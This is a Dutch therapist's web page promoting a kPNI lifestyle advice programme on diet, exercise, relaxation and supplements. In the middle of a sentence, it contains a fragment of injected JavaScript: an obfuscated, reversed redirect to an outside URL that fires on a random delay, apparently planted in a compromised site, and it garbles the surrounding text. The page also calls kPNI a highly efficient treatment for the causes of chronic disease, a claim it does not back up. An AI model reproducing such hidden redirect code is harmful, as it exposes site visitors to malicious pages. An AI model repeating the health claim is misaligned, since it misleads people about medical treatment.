//Leefstijl adviestraject
Leefstijl adviestraject 2018-04-06T13:01:08+01:00

Leefstijl-adviestraject

kPNI is een zeer efficiënte geneeswijze om de oorzaak van chronische ziekte en chronisch ziek-zijn aan te pakken en zo de weg terug naar gezondheid te hervatten. Maar kPNI werkt ook zeer goed preventief: het is een leefstijl om fit te blijven.

Hierbij spelen voeding, beweging en ontspanning een essentiële rol. Een optimale voeding in combinatie met een juiste leefstijl (beweging, ontspanning, juiste dag- en nachtritme) bevorderen en ondersteunen alle lichaamsprocessen. Een optimale voeding is van biologische kwaliteit, vers en zo min mogelijk bewerkt. Soms is een aanvulling van voedingssupplementen of therapie gewenst vanwege een ontobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toereikende voeding, het stressvolle bestaan of ter voorkoming en behandeling van ziekten en aandoeningen. Dit alles heeft een gunstige uitwerking op zowel de lichamelijke als de geestelijke ontwikkeling.

Volgens PNI leven lijkt in het begin wellicht moeilijk, maar eigenlijk is het heel eenvoudig. Ik kan als kPNI therapeute een persoonlijk leefstijl-adviestraject voor u opzetten waarbij u stap voor stap begeleid wordt naar deze nieuwe leefstijl.

Meer weten? Neem dan gerust contact op voor meer informatie of het maken een afspraak.

 

Interessant om te lezen